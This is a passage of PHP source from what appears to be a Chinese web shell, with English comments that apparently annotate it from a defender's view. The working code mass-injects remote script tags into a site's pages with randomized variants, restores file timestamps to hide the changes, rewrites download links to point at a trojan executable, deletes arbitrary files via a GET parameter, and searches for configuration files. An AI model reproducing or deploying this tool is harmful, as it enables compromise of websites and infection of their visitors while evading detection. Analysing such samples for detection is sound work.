目录({$NUM_D}) / 文件({$NUM_F})</div> 
</form> 
END;
	return true;
}

// Bulk injection of a snippet into site files (批量挂马)
// Returns a string of $length random uppercase letters A-Z, drawn with rand().
// Guama_Make() uses it to vary the injected snippet from file to file.
function Guama_Pass($length)
{
	$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
	$str = "";
	while(strlen($str) < $length) $str .= substr($possible,(rand() % strlen($possible)),1);
	return $str;
}

// Replaces every occurrence of placeholder $codea in $codec with a fresh random
// uppercase string of length $codeb.
// Defender note: because the random part differs per file, searching for one exact
// injected string will miss other infected files; match on the constant part instead.
function Guama_Make($codea,$codeb,$codec)
{
	return str_replace($codea,Guama_Pass($codeb),$codec);
}

// Walks directory $gp and writes a snippet into every file whose name matches $gt.
//   $gp - start directory
//   $gt - filename pattern selecting files to modify
//   $gl - filename pattern for entries to skip (empty disables the filter)
//   $gc - snippet to insert
//   $gm - length of the random string that replaces the placeholder (0 = none, above 12 is rejected)
//   $gf - placeholder text inside $gc
//   $gi - position: a = before </head>, b = top of file, c = end of file
//   $gk - text that marks a file as already containing the snippet (empty disables the check)
//   $gd - when true, the file's previous modification time is put back after writing
//   $gb - when true, sub-directories are processed recursively
// Prints one success/failure line per written file; returns false when $gp cannot
// be opened or $gm exceeds 12, true otherwise.
// Defender note: with $gd set, mtime shows nothing unusual on modified files, so
// integrity checks should compare content against a known-good copy or hash
// baseline. On POSIX filesystems touch() cannot set the inode change time (ctime),
// which therefore still reflects the moment of the write.
function Guama_Auto($gp,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb)
{
	if(($h_d = @opendir($gp)) == NULL) return false;
	if($gm > 12) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' || $Filename == \'..\') continue;
		// Exclusion filter on the entry name.
		if($gl != \'\'){if(eregi($gl,$Filename)) continue;}
		$Filepath = File_Str($gp.\'/\'.$Filename);
		if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb);
		if(eregi($gt,$Filename))
		{
			$fc = File_Read($Filepath);
			// Skip files that already contain the marker text.
			if(($gk != \'\') && (stristr($fc,chop($gk)))) continue;
			// Per-file variant of the snippet when a placeholder and length are given.
			if(($gf != \'\') && ($gm != 0)) $gcm = Guama_Make($gf,$gm,$gc); else $gcm = $gc;
			// Remember the current mtime so it can be restored after the write.
			if($gd) $ftime = @filemtime($Filepath);
			// Mode a: only files containing a </head> tag are touched.
			if($gi == \'a\'){if(!stristr($fc,\'</head>\')) continue; $fcm = str_replace(\'</head>\',"\r\n".$gcm."\r\n".\'</head>\',$fc); $fcm = str_replace(\'</HEAD>\',"\r\n".$gcm."\r\n".\'</HEAD>\',$fcm);}
			if($gi == \'b\') $fcm = $gcm."\r\n".$fc;
			if($gi == \'c\') $fcm = $fc."\r\n".$gcm;
			echo File_Write($Filepath,$fcm,\'wb\') ? \'<font color="#006600">成功:</font>\'.$Filepath.\' <br>\'."\r\n" : \'<font color="#FF0000">失败:</font>\'.$Filepath.\' <br>\'."\r\n";
			if($gd) @touch($Filepath,$ftime);
			// Push progress output to the browser after each file.
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

// Request handler and form for the bulk-injection feature (reached as "?s=b").
// With POST fields gp (path), gt (file types) and gc (snippet) present, it prepares
// the arguments and runs Guama_Auto(), then returns false. Otherwise it prints the
// form and returns true.
// A "[-N-]" tag inside gc (N = one or two digits) is the placeholder that is later
// replaced by N random letters; the text before the tag is used as the
// "already present" marker unless the gx checkbox is off.
// Other fields: gl + inout (exclusion filter), gi (insert position), gd (keep
// modification time), gb (recurse into sub-directories).
// Defender note: POSTs to "?s=b" carrying gp/gt/gc are the log-side trace of a bulk
// injection run; the "keep modification time" option is pre-ticked in the form, so
// timestamps are unlikely to reveal which files were changed.
function Guama_b()
{
	if((!empty($_POST[\'gp\'])) && (!empty($_POST[\'gt\'])) && (!empty($_POST[\'gc\'])))
	{
		echo \'<div class="actall">\';
		// Dots in the type lists are escaped because the lists are later used as patterns.
		$_POST[\'gt\'] = str_replace(\'.\',\'\\.\',$_POST[\'gt\']);
		if($_POST[\'inout\'] == \'a\') $_POST[\'gl\'] = str_replace(\'.\',\'\\.\',$_POST[\'gl\']); else $_POST[\'gl\'] = \'\';
		if(stristr($_POST[\'gc\'],\'[-\') && stristr($_POST[\'gc\'],\'-]\'))
		{
			$temp = explode(\'[-\',$_POST[\'gc\']);
			// Constant part of the snippet, in front of the placeholder.
			$gk = $temp[0];
			preg_match_all("/\[\-([^~]*?)\-\]/i",$_POST[\'gc\'],$nc);
			// The placeholder must hold a one- or two-digit number; otherwise abort.
			if(!eregi("^[0-9]{1,2}$",$nc[1][0])){echo \'<a href="#" onclick="history.back();">异常终止</a>\'; return false;}
			$gm = (int)$nc[1][0];
			$gf = $nc[0][0];
		}
		else
		{
			$gk = $_POST[\'gc\'];
			$gm = 0;
			$gf = \'\';
		}
		// Without the gx checkbox the duplicate check is switched off.
		if(!isset($_POST[\'gx\'])) $gk = \'\';
		$gd = isset($_POST[\'gd\']) ? true : false;
		$gb = ($_POST[\'gb\'] == \'a\') ? true : false;
		echo Guama_Auto($_POST[\'gp\'],$_POST[\'gt\'],$_POST[\'gl\'],$_POST[\'gc\'],$gm,$gf,$_POST[\'gi\'],$gk,$gd,$gb) ? \'<a href="#" onclick="history.back();">挂马完毕</a>\' : \'<a href="#" onclick="history.back();">异常终止</a>\';
		echo \'</div>\';
		return false;
	}
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
print<<<END
<script language="javascript">
function Fulll(i)
{
	if(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";sform.gp.value = Str[i];}
  else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";sform.gt.value = Str[i];}
  return true;
}
function autorun()
{
	if(document.getElementById(\'gp\').value == \'\'){alert(\'挂马路径不能为空\');return false;}
	if(document.getElementById(\'gt\').value == \'\'){alert(\'文件类型不能为空\');return false;}
	if(document.getElementById(\'gc\').value == \'\'){alert(\'挂马代码不能为空\');return false;}
	document.getElementById(\'sform\').submit();
}
</script>
<form method="POST" name="sform" id="sform" action="?s=b">
<div class="actall" style="height:35px;">挂马路径 <input type="text" name="gp" id="gp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange=\'return Fulll(options[selectedIndex].value)\'>
<option value="0" selected>--范围选择--</option>
<option value="1">网站跟目录</option>
<option value="2">本程序目录</option>
</select></div>
<div class="actall" style="height:35px;">文件类型 <input type="text" name="gt" id="gt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange=\'return Fulll(options[selectedIndex].value)\'>
<option value="0" selected>--类型选择--</option>
<option value="3">静态文件</option>
<option value="4">脚本静态</option>
<option value="5">JS文件</option>
</select></div>
<div class="actall" style="height:35px;">过滤对象 <input type="text" name="gl" value="templet|templets|default|editor|fckeditor.html" style="width:500px;" disabled>
<input type="radio" name="inout" value="a" onclick="gl.disabled=false;">开启 <input type="radio" name="inout" value="b" onclick="gl.disabled=true;" checked>关闭</div>
<div class="actall">挂马代码 <textarea name="gc" id="gc" style="width:610px;height:180px;"><script language=javascript src="http://www.baidu.com/ad.js?[-6-]"></script></textarea>
<div class="msgbox">挂马变形说明: 程序自动寻找[-6-]标签,替换为随机字符,6表示六位随机字符,最大12位,如果不变形可以不加[-6-]标签.
<br>挂上示例: <script language=javascript src="http://www.baidu.com/ad.js?EMTDSU"></script></div></div>
<div class="actall" style="height:35px;"><input type="radio" name="gi" value="a" checked>插入</head>标签之前 
<input type="radio" name="gi" value="b">插入文件最顶端 
<input type="radio" name="gi" value="c">插入文件最末尾</div>
<div class="actall" style="height:30px;"><input type="checkbox" name="gx" value="1" checked>智能过滤重复代码 <input type="checkbox" name="gd" value="1" checked>保持文件修改时间不变</div>
<div class="actall" style="height:50px;"><input type="radio" name="gb" value="a" checked>将挂马应用于该文件夹,子文件夹和文件
<br><input type="radio" name="gb" value="b">仅将挂马应用于该文件夹</div>
<div class="actall"><input type="button" value="开始挂马" style="width:80px;height:26px;" onclick="autorun();"></div>
</form>
END;
return true;
}

// Bulk removal of an injected snippet (批量清马)

// Walks directory $qp and deletes every occurrence of the string $qc from files
// whose name matches $qt.
//   $qp - start directory
//   $qt - filename pattern selecting files to process
//   $qc - exact text to remove (files are selected case-insensitively, but the
//         removal itself is a case-sensitive str_replace)
//   $qd - when true, the file's previous modification time is put back after writing
//   $qb - when true, sub-directories are processed recursively
// Prints one success/failure line per written file; returns false when $qp cannot
// be opened, true otherwise.
// Defender note: this removes one literal string only and, with $qd set, hides the
// write from mtime-based checks. Restoring affected files from a known-good backup
// is the dependable clean-up.
function Qingma_Auto($qp,$qt,$qc,$qd,$qb)
{
	if(($h_d = @opendir($qp)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' || $Filename == \'..\') continue;
		$Filepath = File_Str($qp.\'/\'.$Filename);
		if(is_dir($Filepath) && $qb) Qingma_Auto($Filepath,$qt,$qc,$qd,$qb);
		if(eregi($qt,$Filename))
		{
			$ic = File_Read($Filepath);
			// Files without the text are left untouched.
			if(!stristr($ic,$qc)) continue;
			$ic = str_replace($qc,\'\',$ic);
			if($qd) $ftime = @filemtime($Filepath);
			echo File_Write($Filepath,$ic,\'wb\') ? \'<font color="#006600">成功:</font>\'.$Filepath.\' <br>\'."\r\n" : \'<font color="#FF0000">失败:</font>\'.$Filepath.\' <br>\'."\r\n";
			if($qd) @touch($Filepath,$ftime);
			// Push progress output to the browser after each file.
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

// Request handler and form for the bulk-removal feature (reached as "?s=c").
// With POST fields qp (path), qt (file types) and qc (text to remove) present, it
// runs Qingma_Auto() and returns false; otherwise it prints the form and returns true.
// Other fields: qd (keep modification time), qb (recurse into sub-directories).
function Qingma_c()
{
	if((!empty($_POST[\'qp\'])) && (!empty($_POST[\'qt\'])) && (!empty($_POST[\'qc\'])))
	{
		echo \'<div class="actall">\';
		// Dots in the type list are escaped because the list is used as a pattern.
		$qt = str_replace(\'.\',\'\\.\',$_POST[\'qt\']);
		$qd = isset($_POST[\'qd\']) ? true : false;
		$qb = ($_POST[\'qb\'] == \'a\') ? true : false;
		echo Qingma_Auto($_POST[\'qp\'],$qt,$_POST[\'qc\'],$qd,$qb) ? \'<a href="#" onclick="history.back();">清马完毕</a>\' : \'<a href="#" onclick="history.back();">异常终止</a>\';
		echo \'</div>\';
		return false;
	}
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
print<<<END
<script language="javascript">
function Fullll(i){
	if(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";xform.qp.value = Str[i];}
	else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";xform.qt.value = Str[i];}
  return true;
}
function autoup(){
	if(document.getElementById(\'qp\').value == \'\'){alert(\'清马路径不能为空\');return false;}
	if(document.getElementById(\'qt\').value == \'\'){alert(\'文件类型不能为空\');return false;}
	if(document.getElementById(\'qc\').value == \'\'){alert(\'清除代码不能为空\');return false;}
	document.getElementById(\'xform\').submit();
}
</script>
<form method="POST" name="xform" id="xform" action="?s=c">
<div class="actall" style="height:35px;">清马路径 <input type="text" name="qp" id="qp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange=\'return Fullll(options[selectedIndex].value)\'>
<option value="0" selected>--范围选择--</option>
<option value="1">网站跟目录</option>
<option value="2">本程序目录</option>
</select></div>
<div class="actall" style="height:35px;">文件类型 <input type="text" name="qt" id="qt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange=\'return Fullll(options[selectedIndex].value)\'>
<option value="0" selected>--类型选择--</option>
<option value="3">静态文件</option>
<option value="4">脚本+静态</option>
<option value="5">JS文件</option>
</select></div>
<div class="actall">清除代码 <textarea name="qc" id="qc" style="width:610px;height:180px;"><script language=javascript src="http://www.baidu.com/ad.js"></script></textarea></div>
<div class="actall" style="height:30px;"><input type="checkbox" name="qd" value="1" checked>保持文件修改时间不变</div>
<div class="actall" style="height:50px;"><input type="radio" name="qb" value="a" checked>将清马应用于该文件夹,子文件夹和文件
<br><input type="radio" name="qb" value="b">仅将清马应用于该文件夹</div>
<div class="actall"><input type="button" value="开始清马" style="width:80px;height:26px;" onclick="autoup();"></div>
</form>
END;
	return true;
}

// Bulk search-and-replace in site files (批量替换)

// Walks directory $tp and rewrites content in files whose name matches $tt.
//   $tp  - start directory
//   $tt  - filename pattern selecting files to process
//   $th  - mode: true = replace the literal text $tca with $tcb;
//          false = collect every href="..." value and replace those matching
//          pattern $tca with $tcb
//   $tca - text to find (mode true) or pattern for link targets (mode false)
//   $tcb - replacement text or replacement URL
//   $td  - when true, the file's previous modification time is put back afterwards
//   $tb  - when true, sub-directories are processed recursively
// Prints one success/failure line per written file; returns false when $tp cannot
// be opened, true otherwise.
// Defender note: in link mode this repoints existing links on the site to another
// address while the pages otherwise look unchanged. Checking that download links
// still resolve to the expected host, and comparing page content against a
// known-good baseline, detects it; mtime does not when $td is set.
function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb)
{
	if(($h_d = @opendir($tp)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' || $Filename == \'..\') continue;
		$Filepath = File_Str($tp.\'/\'.$Filename);
		if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb);
		// Set to true once this file's content has actually been changed.
		$doing = false;
		if(eregi($tt,$Filename))
		{
			$ic = File_Read($Filepath);
			if($th)
			{
				if(!stristr($ic,$tca)) continue;
				$ic = str_replace($tca,$tcb,$ic);
				$doing = true;
			}
			else
			{
				// Collect all href values, then swap each one that matches the pattern.
				preg_match_all("/href\=\"([^~]*?)\"/i",$ic,$nc);
				for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}}
			}
			if($td) $ftime = @filemtime($Filepath);
			if($doing) echo File_Write($Filepath,$ic,\'wb\') ? \'<font color="#006600">成功:</font>\'.$Filepath.\' <br>\'."\r\n" : \'<font color="#FF0000">失败:</font>\'.$Filepath.\' <br>\'."\r\n";
			if($td) @touch($Filepath,$ftime);
			// Push progress output to the browser after each file.
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

// Tihuan_d: request handler for the bulk find-and-replace page (form action ?s=d).
// With POST tp (start path) and tt (file-name pattern list) set, it runs
// Tihuan_Auto over that tree and prints the outcome; otherwise it prints the form.
// Returns false after a replace run and true after printing the form.
// Defender note: this is the mass content-rewrite feature of the shell. Files are
// rewritten in place, and the td option makes Tihuan_Auto put each file's previous
// mtime back with touch(), so modification times cannot be used to find the altered
// files; compare content hashes against a known-good baseline instead.
function Tihuan_d()
{
	if((!empty($_POST[\'tp\'])) && (!empty($_POST[\'tt\'])))
	{
		echo \'<div class="actall">\';
		// Escape dots so the ".htm|.html" style list works as a regex alternation
		// (Tihuan_Auto matches file names against it with eregi).
		$tt = str_replace(\'.\',\'\\.\',$_POST[\'tt\']);
		// td: keep the original modification time of every rewritten file.
		$td = isset($_POST[\'td\']) ? true : false;
		// tb: "a" means recurse into subfolders.
		$tb = ($_POST[\'tb\'] == \'a\') ? true : false;
		// th: "a" means literal find/replace of tca by tcb; any other value makes
		// Tihuan_Auto rewrite href targets that match tca.
		$th = ($_POST[\'th\'] == \'a\') ? true : false;
		if($th) $_POST[\'tca\'] = str_replace(\'.\',\'\\.\',$_POST[\'tca\']);
		echo Tihuan_Auto($_POST[\'tp\'],$tt,$th,$_POST[\'tca\'],$_POST[\'tcb\'],$td,$tb) ? \'<a href="#" onclick="window.location=\\'?s=d\\'">替换完毕</a>\' : \'<a href="#" onclick="window.location=\\'?s=d\\'">异常终止</a>\';
		echo \'</div>\';
		return false;
	}
	// No replace request: prefill the form with this script's directory and the
	// value of File_Mode() (defined elsewhere; presumably the web root, since the
	// form labels it as the site root directory).
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
	// The form below is emitted verbatim. Its second mode presets a list of download
	// extensions and an .exe URL as the replacement, i.e. it swaps the download links
	// found in site pages for a link chosen by the operator.
print<<<END
<script language="javascript">
function Fulllll(i){
	if(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";tform.tp.value = Str[i];}
	else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";tform.tt.value = Str[i];}
  return true;
}
function showth(th){
	if(th == \'a\') document.getElementById(\'setauto\').innerHTML = \'查找内容 <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>替换成为 <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea>\';
	if(th == \'b\') document.getElementById(\'setauto\').innerHTML = \'<br>下载后缀 <input type="text" name="tca" id="tca" value=".exe|.z0|.rar|.zip|.gz|.torrent" style="width:500px;"><br><br>替换成为 <input type="text" name="tcb" id="tcb" value="http://www.baidu.com/download/muma.exe" style="width:500px;">\';
	return true;
}
function autoup(){
	if(document.getElementById(\'tp\').value == \'\'){alert(\'替换路径不能为空\');return false;}
	if(document.getElementById(\'tt\').value == \'\'){alert(\'文件类型不能为空\');return false;}
	if(document.getElementById(\'tca\').value == \'\'){alert(\'替换代码不能为空\');return false;}
	document.getElementById(\'tform\').submit();
}
</script>
<form method="POST" name="tform" id="tform" action="?s=d">
<div class="actall" style="height:35px;">替换路径 <input type="text" name="tp" id="tp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange=\'return Fulllll(options[selectedIndex].value)\'>
<option value="0" selected>--范围选择--</option>
<option value="1">网站跟目录</option>
<option value="2">本程序目录</option>
</select></div>
<div class="actall" style="height:35px;">文件类型 <input type="text" name="tt" id="tt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange=\'return Fulllll(options[selectedIndex].value)\'>
<option value="0" selected>--类型选择--</option>
<option value="3">静态文件</option>
<option value="4">脚本+静态</option>
<option value="5">JS文件</option>
</select></div>
<div class="actall" style="height:235px;"><input type="radio" name="th" value="a" onclick="showth(\'a\')" checked>替换文件中的指定内容 <input type="radio" name="th" value="b" onclick="showth(\'b\')">替换文件中的下载地址<br>
<div id="setauto">查找内容 <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>替换成为 <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea></div></div>
<div class="actall" style="height:30px;"><input type="checkbox" name="td" value="1" checked>保持文件修改时间不变</div>
<div class="actall" style="height:50px;"><input type="radio" name="tb" value="a" checked>将替换应用于该文件夹,子文件夹和文件
<br><input type="radio" name="tb" value="b">仅将替换应用于该文件夹</div>
<div class="actall"><input type="button" value="开始替换" style="width:80px;height:26px;" onclick="autoup();"></div>
</form>
END;
	return true;
}

//扫描木马

// Antivirus_Auto: walk directory $sp and print every file whose name matches the
// regex $st and whose content contains one of the $features substrings.
//   $sp        directory to scan
//   $features  map of label => substring, searched case-insensitively with stristr
//   $st        regex of file-name extensions to inspect, matched with eregi
//   $sb        when true, descend into subdirectories
// Returns false when the directory cannot be opened, true otherwise.
// Reviewer note: eregi() was removed in PHP 7.0, which dates this sample to legacy
// PHP runtimes.
function Antivirus_Auto($sp,$features,$st,$sb)
{
	if(($h_d = @opendir($sp)) == NULL) return false;
	$ROOT_DIR = File_Mode();
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' || $Filename == \'..\') continue;
		$Filepath = File_Str($sp.\'/\'.$Filename);
		if(is_dir($Filepath) && $sb) Antivirus_Auto($Filepath,$features,$st);
		if(eregi($st,$Filename))
		{
			// The shell excludes its own file from the results.
			if($Filepath == File_Str(__FILE__)) continue;
			$ic = File_Read($Filepath);
			foreach($features as $var => $key)
			{
				if(stristr($ic,$key))
				{
					// Turn the on-disk path into a URL by swapping the File_Mode() prefix
					// for http://SERVER_NAME/.
					$Fileurls = str_replace($ROOT_DIR,\'http://\'.$_SERVER[\'SERVER_NAME\'].\'/\',$Filepath);
					$Filetime = @date(\'Y-m-d H:i:s\',@filemtime($Filepath));
					// Each hit carries an edit link (fp, fn, dim) and a delete link (df);
					// both point at ?s=e, the handler that acts on those GET parameters.
					// Paths and labels are written into the HTML without escaping.
					echo \' <a href="\'.$Fileurls.\'" target="_blank"> <font color="#8B0000"> \'.$Filepath.\' </font> </a> <br> 【<a href="?s=e&fp=\'.urlencode($sp).\'&fn=\'.$Filename.\'&dim=\'.urlencode($key).\'" target="_blank"> 编辑 </a> <a href="?s=e&df=\'.urlencode($Filepath).\'" target="_blank"> 删除 </a> 】 \';
					echo \' 【 \'.$Filetime.\' 】 <font color="#FF0000"> \'.$var.\' </font> <br> <br> \'."\r\n";
					// Only the first matching feature is reported per file.
					break;
				}
			}
			// Push partial results to the browser while the walk continues.
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

// Antivirus_e: request handler for the scanner page (form action ?s=e).
// Three entry paths, checked in this order:
//   GET df            delete that path and stop (returns false)
//   GET fp, fn, dim   hand over to File_Edit (defined elsewhere) and stop
//   otherwise         print the scan form and, when POST sp is set, run the scan
// Defender note: a bare GET carrying df removes any file the PHP process is allowed
// to delete, so requests with s=e and df in the query string are worth searching for
// in access logs. The df value is also echoed back without HTML escaping.
function Antivirus_e()
{
	// Delete path: unlink, and on failure loosen the mode to 0666 and retry once.
	if(!empty($_GET[\'df\'])){echo $_GET[\'df\'];if(@unlink($_GET[\'df\'])){echo \'删除成功\';}else{@chmod($_GET[\'df\'],0666);echo @unlink($_GET[\'df\']) ? \'删除成功\' : \'删除失败\';} return false;}
	if((!empty($_GET[\'fp\'])) && (!empty($_GET[\'fn\'])) && (!empty($_GET[\'dim\']))) { File_Edit($_GET[\'fp\'],$_GET[\'fn\'],$_GET[\'dim\']); return false; }
	$SCAN_DIR = isset($_POST[\'sp\']) ? $_POST[\'sp\'] : File_Mode();
	// Signature tables: label => substring. These are plain substring indicators of
	// other web shells (eval on request data, upload handlers, known author strings).
	// Several of them, such as readdir( and move_uploaded_file($_FILES, are also
	// common in ordinary applications, so a hit is a lead to review, not a verdict.
	$features_php = array(\'php大马特征1\'=>\'cha88.cn\',\'php大马特征2\'=>\'->read()\',\'php大马特征3\'=>\'readdir(\',\'危险MYSQL语句4\'=>\'returns string soname\',\'php加密大马特征5\'=>\'eval(gzinflate(\',\'php加密大马特征6\'=>\'eval(base64_decode(\',\'php一句话特征7\'=>\'eval($_\',\'php一句话特征8\'=>\'eval ($_\',\'php上传后门特征9\'=>\'copy($_FILES\',\'php上传后门特征10\'=>\'copy ($_FILES\',\'php上传后门特征11\'=>\'move_uploaded_file($_FILES\',\'php上传后门特征12\'=>\'move_uploaded_file ($_FILES\',\'php小马特征13\'=>\'str_replace(\\'\\\\\\',\\'/\\',\');
	$features_asx = array(\'asp小马特征1\'=>\'绝对路径\',\'asp小马特征2\'=>\'输入马的内容\',\'asp小马特征3\'=>\'fso.createtextfile(path,true)\',\'asp一句话特征4\'=>\'<%execute(request\',\'asp一句话特征5\'=>\'<%eval request\',\'asp一句话特征6\'=>\'execute session(\',\'asp数据库后门特征7\'=>\'--Created!\',\'asp大马特征8\'=>\'WScript.Shell\',\'asp大小马特征9\'=>\'<%@ LANGUAGE = VBScript.Encode %>\',\'aspx大马特征10\'=>\'www.rootkit.net.cn\',\'aspx大马特征11\'=>\'Process.GetProcesses\',\'aspx大马特征12\'=>\'lake2\');
	// The scan path is interpolated into the form without HTML escaping.
print<<<END
<form method="POST" name="tform" id="tform" action="?s=e">
<div class="actall">扫描路径 <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">木马类型 <input type="checkbox" name="stphp" value="php" checked>php木马 
<input type="checkbox" name="stasx" value="asx">asp+aspx木马</div>
<div class="actall" style="height:50px;"><input type="radio" name="sb" value="a" checked>将扫马应用于该文件夹,子文件夹和文件
<br><input type="radio" name="sb" value="b">仅将扫马应用于该文件夹</div>
<div class="actall"><input type="submit" value="开始扫描" style="width:80px;"></div>
</form>
END;
	if(!empty($_POST[\'sp\']))
	{
		echo \'<div class="actall">\';
		// Pick the signature table and the file-name regex for the chosen family.
		// Each regex also matches names containing a semicolon; presumably this is
		// meant to catch names of the a.asp;.jpg kind - TODO confirm.
		if(isset($_POST[\'stphp\'])){$features_all = $features_php; $st = \'\.php|\.inc|\;\';}
		if(isset($_POST[\'stasx\'])){$features_all = $features_asx; $st = \'\.asp|\.asa|\.cer|\.aspx|\.ascx|\;\';}
		if(isset($_POST[\'stphp\']) && isset($_POST[\'stasx\'])){$features_all = array_merge($features_php,$features_asx); $st = \'\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;\';}
		// sb: "a" means scan subfolders as well.
		$sb = ($_POST[\'sb\'] == \'a\') ? true : false;
		echo Antivirus_Auto($_POST[\'sp\'],$features_all,$st,$sb) ? \'扫描完毕\' : \'异常终止\';
		echo \'</div>\';
	}
	return true;
}

//搜索文件

// Findfile_Auto: walk directory $sfp and print a link for every entry that matches
// the keyword $sfc.
//   $sfp  directory to search
//   $sfc  keyword, matched case-insensitively with stristr
//   $sft  regex of names to skip (eregi); skipped entries are not descended into
//   $sff  true: match the keyword against the file name; false: against the content
//   $sfb  when true, descend into subdirectories
// Returns false when the directory cannot be opened, true otherwise.
function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb)
{
	//echo $sfp.\'<br>\'.$sfc.\'<br>\'.$sft.\'<br>\'.$sff.\'<br>\'.$sfb;
	if(($h_d = @opendir($sfp)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' || $Filename == \'..\') continue;
		// Exclusion filter runs before the directory check.
		if(eregi($sft,$Filename)) continue;
		$Filepath = File_Str($sfp.\'/\'.$Filename);
		if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb);
		if($sff)
		{
			// Name search: each hit links to ?s=p with the folder (fp) and name (fn).
			if(stristr($Filename,$sfc))
			{
				echo \'<a target="_blank" href="?s=p&fp=\'.urlencode($sfp).\'&fn=\'.urlencode($Filename).\'"> \'.$Filepath.\' </a><br>\'."\r\n";
				ob_flush();
				flush();
			}
		}
		else
		{
			// Content search: the file is read through File_Read (defined elsewhere)
			// before the keyword test.
			$File_code = File_Read($Filepath);
			if(stristr($File_code,$sfc))
			{
				echo \'<a target="_blank" href="?s=p&fp=\'.urlencode($sfp).\'&fn=\'.urlencode($Filename).\'"> \'.$Filepath.\' </a><br>\'."\r\n";
				ob_flush();
				flush();
			}
		}
	}
	@closedir($h_d);
	return true;
}

// Findfile_j: request handler for the file search page (form action ?s=j).
// GET df deletes a path and GET fp, fn, dim opens File_Edit, exactly as in the
// scanner handler; otherwise the search form is printed and, when POST sfp and sfc
// are set, Findfile_Auto is run. Returns false on the delete and edit paths, true
// otherwise.
// Defender note: the preset keyword is "config" and the preset exclusion list is
// media and archive extensions, which suggests the search is aimed at configuration
// files - TODO confirm against how the operator used it. Requests with s=j and
// POSTed sfp and sfc are the log trace of this feature.
function Findfile_j()
{
	// Delete path: unlink, and on failure loosen the mode to 0666 and retry once.
	// The df value is echoed without HTML escaping.
	if(!empty($_GET[\'df\'])){echo $_GET[\'df\'];if(@unlink($_GET[\'df\'])){echo \'删除成功\';}else{@chmod($_GET[\'df\'],0666);echo @unlink($_GET[\'df\']) ? \'删除成功\' : \'删除失败\';} return false;}
	if((!empty($_GET[\'fp\'])) && (!empty($_GET[\'fn\'])) && (!empty($_GET[\'dim\']))) { File_Edit($_GET[\'fp\'],$_GET[\'fn\'],$_GET[\'dim\']); return false; }
	// Form defaults; POSTed values are interpolated into the form without escaping.
	$SCAN_DIR = isset($_POST[\'sfp\']) ? $_POST[\'sfp\'] : File_Mode();
	$SCAN_CODE = isset($_POST[\'sfc\']) ? $_POST[\'sfc\'] : \'config\';
	$SCAN_TYPE = isset($_POST[\'sft\']) ? $_POST[\'sft\'] : \'.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip\';
print<<<END
<form method="POST" name="jform" id="jform" action="?s=j">
<div class="actall">扫描路径 <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">过滤文件 <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div>
<div class="actall">关键字串 <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;">
<input type="radio" name="sff" value="a" checked>搜索文件名 
<input type="radio" name="sff" value="b">搜索包含文字</div>
<div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked>将搜索应用于该文件夹,子文件夹和文件
<br><input type="radio" name="sfb" value="b">仅将搜索应用于该文件夹</div>
<div class="actall"><input type="submit" value="开始扫描" style="width:80px;"></div>
</form>
END;
	if((!empty($_POST[\'sfp\'])) && (!empty($_POST[\'sfc\'])))
	{
		echo \'<div class="actall">\';
		// Escape dots so the exclusion list can be used as a regex alternation.
		$_POST[\'sft\'] = str_replace(\'.\',\'\\.\',$_POST[\'sft\']);
		// sff: "a" = search file names, otherwise search file contents.
		$sff = ($_POST[\'sff\'] == \'a\') ? true : false;
